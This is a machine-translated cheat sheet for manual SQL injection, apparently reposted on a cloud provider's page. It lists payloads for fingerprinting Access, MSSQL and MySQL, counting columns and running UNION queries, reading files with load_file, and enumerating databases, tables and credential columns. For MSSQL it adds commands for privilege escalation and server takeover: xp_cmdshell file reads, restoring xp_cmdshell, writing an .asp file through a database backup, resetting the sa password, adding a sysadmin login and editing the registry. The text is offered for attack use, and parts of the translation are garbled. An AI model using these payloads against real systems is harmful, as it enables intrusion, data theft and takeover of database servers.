Manually injecting common SQL statements

Source: Internet
Author: User
Tags explode mssql ord

To determine the database type:
Access:
and (select ID from msysaccessobjects) >0 return to the normal description is access


MSSQL:
and (select ID from sysobjects) >0 return to normal description is MSSQL


Mysql:
and length (user ()) >0 return to normal description is MySQL


Mysql:

1. Determine version and Ord (Mid (Version (), plus)) >51/* Return normal description is 4.0 or higher, you can use union query
2. Use ORDER by storm field, add order by 10/* After URL if return normal description field greater than 10
3. Use the Union to query the exact field, such as order by OR and 1=2 Union select,......./* until it returns to normal, indicating the number of exact fields guessed. If you filter the space can be replaced with/**/.
4. Determine if the database connection account has write permissions, and (select COUNT (*) from Mysql.user) >0/* If the result returns an error, then we can only guess the administrator account and password.
5. If you return to normal, you can 1=2 Union select 1,2,3,4,5,6,load_file (char (ASCII value of the file path, separated by commas), 8,9,10/* Note: Load_file (char ( The ASCII value of the file path, separated by commas) can also be used in hexadecimal to read the configuration file, locate the database connection, and so on.

6, detection is not root permission And/**/ord (Mid (User (), 1, 1)) =114/*

7, MySQL built-in function hex () conversion character is 16, such as Select Hex (User ())
MySQL built-in function Unhex () Decodes 16 binary, such as select Unhex (Hex (user))

8. mysql built-in function concat () merges multiple columns into one column, such as SELECT Concat (Username,0x3a,password) from T_member

9 commonly used built-in functions use:
Select System_user () View system users

Select Current_User () query the current user

Select User () queries users

SELECT version () queries the database version

SELECT database () queries the currently connected databases

SELECT @ @version_compile_os Query the current operating system

SELECT @ @datadir Query Read database path
SELECT @ @basedir query MySQL installation path

----------------------Satin Split-line---------------------------------------------

Remove limit to all rows, the first number represents the number of queries, and the second number represents a single query.
The first number increments from 1, and the query returns an error to the 3 o'clock browser, stating that there are 2 libraries/tables.

10, check the number of databases
Union Select Cuncat (schema_name,0x3a) from Information_schema.schemata limit


11. Enquiry Form
Union SELECT table_name from information_schema.tables where Table_schema = library name limit


MSSQL:

Detect if the SA permission
and 1= (select Is_srvrolemember (' sysadmin '));--

To detect if DB permissions
and 1= (Select is_member (' db_owner '))

Explode all databases union select name from Master.dbo.sysdatabases where Dbid=1 1 represents the first library

Explode all Tables
First table Union select top 1 name from library name. dbo.sysobjects where xtype= ' U '

Second table Union select top 1 name from library name. dbo.sysobjects where xtype= ' U ' and name not in (' first table ')

The third table union select top 1 name from library name. dbo.sysobjects where xtype= ' U ' and name not in (' first table ', ' second table ')
...


Burst column:
Burst ID Select ID from seay.dbo.sysobjects where xtype= ' U ' and name= ' admin '

Explode first column select top 1 name from Seay.dbo.syscolumns where Id=id number

Burst the second column select top 1 name from Seay.dbo.syscolumns where Id=id and name not in (' first column ')
...


Burst data:
Select Column name from table name


exec master.dbo.xp_dirtree ' C: \ '; Traverse Directory
EXEC master.dbo.xp_availablemedia;--obtains all current drives
exec master.dbo.xp_subdirs ' c: N ';--Get subdirectory list
exec master.dbo.xp_dirtree ' C: ';--Get the directory tree structure of all subdirectories
exec master.dbo.xp_cmdshell ' type c:\web\web.config ';--View the contents of a file

Back up the database: Backup library name to disk= ' c:/l.asp ';


MSSQL built-in functions:
SELECT @ @version Query database version

Select USER_NAME () query the current database connection user name

Select Db_name () queries the current database name


Change the sa password
exec sp_password NULL, ' New password ', ' sa '


Add SA permissions User
EXEC sp_addlogin ' username ', ' pass ', ' master ';
EXEC sp_addsrvrolemember ' username ', sysadmin

Detect if multiple lines are supported
;d Eclare @d int;--


Stop or activate a service.

EXEC master. Xp_servicecontrol ' Stop ', ' schedule '
EXEC master. Xp_servicecontrol ' start ', ' schedule '


Unpack the zip file.

Xp_unpackcab ' C:\test.cab ', ' C:\Temp ', 1

Recovery xp_cmdshell
; EXEC master. Dbo.sp_addextendedproc ' xp_cmdshell ', ' Xplog70.dll ';--


To turn on sandbox mode:
EXEC master. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1

Manually injecting common SQL statements

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.